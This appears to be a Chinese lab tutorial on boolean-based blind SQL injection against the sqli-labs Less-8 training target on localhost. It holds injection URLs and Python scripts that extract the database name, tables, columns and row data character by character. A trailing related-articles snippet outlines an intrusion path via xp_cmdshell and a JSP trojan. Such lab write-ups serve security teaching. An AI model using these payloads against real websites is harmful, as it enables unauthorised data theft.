SQL注入之基于布尔的盲注详解_数据库其它

基于布尔的盲注

Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。

由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。

本次的示例就是Less-8。

通过进行下面的语句的注入测试

http://localhost/sqlilabs/Less-8/?id=2'
http://localhost/sqlilabs/Less-8/?id=2"
http://localhost/sqlilabs/Less-8/?id=2\

进行测试的时候,只有在id=2'的时候页面无法显示内容。输入的语句如果符合要求,页面就会显示内容,但是显示的内容都是一样的。这种情况下页面上的输出对于我们来说是完全没有用的,包括SQL执行出错的信息都不会在页面上显示。这种情况下之前的通过执行SQL语句然后在页面上显示SQL执行之后返回的信息完全是不可能的啦。这种情况下就是一个典型的SQL盲注了。

我们通过页面是否显示内容来判断我们的SQL语句是否正确,进而猜解数据库的信息。

通过上面的注入测试,我们知道后台的SQL的注入语句的写法是:

select field from table where id='userinput'

id参数是被单引号包括的。其他的信息我们就无法得到了。

得到数据库的名称

在得到数据库的名称之前,首先需要得到数据库的长度

http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1 %23
http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23
以此类推
.....

发现当值为8的时候,页面就没有显示。那么说明database()的长度是8。

得到了datbase()的长度之后,接下来就是得到database()的名称了。

这个时候就不能完全靠手注了,必须编写Python代码来完成。其中最主要就是进行大量的注入测试来判断程序执行正确和出错的时机,然后断定当前的值可能就是正确的值。

下面就是一个简单的使用Python来进行布尔盲注获取数据的代码。

def get_db_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,9):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

得到最后的结果的是security,是正确的。

得到数据库中的表信息

其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的),然后得到当前数据库的表名称,然后得到表的字段,最后进行脱裤。这个步骤在前一章已经有说明了。

首先看一个简单的SQL盲注获取数据库表信息的写法。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23

其实还是使用之前的select table_name from information_schema.tables where table_schema=database() limit 0,1这样的语句来得到表的信息,但是现在是无法在页面上显示的,而是通过盲注来一个字符一个字符的获取表名。

接下也同样是通过编写Python代码来获取表名了。代码也和上面的类似。主要就是修改中的URl。在进行Python获取表名之前,我们同样需要知道表名的长度。

使用如下的语句就可以得到了。

获取表名的SQL注入的写法就是如下

http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23

通过这种方式我们知道数据库表中的第一个表名的长度是6。知道了表名的长度之后,接下来的Python脚本就很好写了。

def get_table_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,7):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

最后得到了第一个表名是emails,如果要得到其他的表名只需要将代码limit 0,1修改成为limit 1,1或者是其他的就可以了。

得到表名的列信息

在得到列名之前,同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度,那么就可以使用如下的语句来获取。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>【num】 %23

修改num的值即可,从0开始一直到到程序出错。通过这种方法,我们得到在emails中存在2个字段,字段的长度分别是2,8。
得到了字段长度之后,接下来就是进行布尔注入得到字段名称了。

在编写代码之前,还是来看如何写获取字段名称的sql语句吧。下面这个代码就是用来获取字段名称的代码。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23

我们编写的Python代码也是利用上面这个代码来获取字段名称。

def get_column_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,3):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面这个代码,我们可以得到在emails表中存在的字段名称分别是idemail_id

脱裤

在得到了字段名称之后,接下来最重要的一步就是进行脱裤了。
在进行脱裤之前,我们首先判断在emails表中有多少条记录。

使用的语句如下:

http://localhost/sqlilabs/Less-8/?id=2' and (select count(*) from emails)>0 %23

修改>0中的0依次为1,2,3之后,我们得到在emails表中一共存在8条记录。

那么接下来就是进行脱裤了。

在脱裤之前,我们首先要知道当前记录的长度,这个SQL语句也很好写。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(email_id) from emails limit 0,1)>15 %23

最后我们知道在emails表中的第一条记录中的email_id的长度是16.

知道了长度之后,代码就很好写了。

def get_data():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23"
 chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,17):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面的这段代码就得到了内容是Dumb@dhakkan.com,其他的内容就同样通过这段方式得到数据了。这里就不作演示了。

总结

其实基于布尔盲注和基于时间的盲注都是需要编写大量的代码,就像本篇的文章一样。之前在简单的SQL注入中,一句SQL注入代码就可以解决的问题在这里就需要编写Python代码来进行大量的注入测试才能够得到内容。其实之前我也很少完整的用Python来编写SQL注入代码完成整个布尔盲注的注入过程。通过本章的编写,熟悉了使用Python代码完整地进行一次布尔盲注的过程了,学习了很多。以上就是这篇文章的全部内容了,希望对大家能有所帮助。

以上是小编为您精心准备的的内容,在的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索sql注入盲注
, sql盲注
基于布尔的盲注
布尔盲注、布尔型盲注、基于布尔的盲注、sql盲注和注入的区别、sql注入盲注,以便于您获取更多的相关知识。

时间: 2024-09-20 09:42:28

SQL注入之基于布尔的盲注详解_数据库其它的相关文章

sql注入之新手入门示例详解_数据库其它

前言 在学习这篇文章之前,至于要学习了SQL注入的前提知识,可以参考之前写的一篇sql注入之必备的基础知识. 认识SQL注入 最开始就从最简单的开始,进入到less-1开始我们的SQL注入学习之旅. 通过改变http://localhost/sqlilabs/Less-1/?id=3的id值,页面上呈现不同的内容(username,password). 那么我们就可以猜测在后台中的SQL语句就是根据前台传入的id值来去对应的数据. 那么SQL语句的写法为: select username,pas

基于JavaScript 类的使用详解_基础知识

以下为构造函数方法创建类: 复制代码 代码如下: function className (prop_1, prop_2, prop_3) {  this.prop1 = prop_1;  this.prop2 = prop_2;  this.prop3 = prop_3;} 有了上面的类,我们就可以为类创建实例: 复制代码 代码如下: var obj_1 = new className(v1, v2, v3)var obj_2 = new className(v1, v2, v3) 我们也可以给

sql left join 命令详解_数据库其它

给个通俗的解释吧. 例表a aid adate 1 a1 2 a2 3 a3 表b bid bdate 1 b1 2 b2 4 b4 两个表a,b相连接,要取出id相同的字段 select * from a inner join b on a.aid = b.bid这是仅取出匹配的数据. 此时的取出的是: 1 a1 b1 2 a2 b2 那么left join 指: select * from a left join b on a.aid = b.bid 首先取出a表中所有数据,然后再加上与a,

SQL行转列和列转行代码详解

行列互转,是一个经常遇到的需求.实现的方法,有case when方式和2005之后的内置pivot和unpivot方法来实现. 在读了技术内幕那一节后,虽说这些解决方案早就用过了,却没有系统性的认识和总结过.为了加深认识,再总结一次. 行列互转,可以分为静态互转,即事先就知道要处理多少行(列);动态互转,事先不知道处理多少行(列). --创建测试环境 USE tempdb; GO IF OBJECT_ID('dbo.Orders') IS NOT NULL DROP TABLE dbo.Orde

asp 实现对SQL注入危险字符进行重编码处理的函数_应用技巧

<% '****************************** '函数:CheckStr(byVal ChkStr) '参数:ChkStr,待验证的字符 '作者:阿里西西 '日期:2007/7/15 '描述:对SQL注入危险字符进行重编码处理 '示例:CheckStr("and 1=1 or select * from") '****************************** Function CheckStr(byVal ChkStr)  Dim Str:Str

sql注入过程详解_动力节点Java学院整理

SQL注入攻击的总体思路是: 1.发现SQL注入位置: 2.判断后台数据库类型: 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5. 上传JSP木马: 6.得到管理员权限: 一.SQL注入漏洞的判断 一般来说,SQL注入一般存在于形如:HTTP://xxx.xxx.xxx/abc.jsp?id=XX等带有参数的jsp或者动态网页中,有时一个动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数,不能一概而论.总之只要是带有参数的动态网页且此网页访问

SQL Server 2008的安全设置技巧方法详解

服务器身份验证 MSSQL Server 2008的身份验证模式有两种:一种是Windows 身份验证模式, 另一种是SQL Server和Windows身份验证模式(即混合模式).对大多数数据库服务器来说,有SQL Server身份验证就足够了,只可惜目前的服务器身份验证模式里没有这个选项,所以我们只能选择同时带有SQL Server和Windows身份验证的模式(混合模式).但这样就带来了两个问题:   1.混合模式里包含了Windows身份验证这个我们所不需要的模式,即设置上的冗余性.程序

ASP.NET2.0 SQL Server数据库连接详解_实用技巧

Connection类有四种:SqlConnection,OleDbConnection,OdbcConnection和OracleConnection. SqlConnection类的对象连接SQL Server数据库:OracleConnection 类的对象连接Oracle数据库: OleDbConnection类的对象连接支持OLE DB的数据库,如Access:而OdbcConnection类的对象连接任何支持ODBC的数据库.与数据库的所有通讯最终都是通过Connection对象来完

JSP基于dom解析xml实例详解_JSP编程

本文实例讲述了JSP基于dom解析xml的方法.分享给大家供大家参考,具体如下: 初次学习用dom操作xml文件,有很多不足之处,牛人多给点建议,练习时我没对中文做乱码处理,也没做验证哦!O(∩_∩)O~ 实体类:User public class User { private String name; private String pwd; private String email; public String getName() { return name; } public void se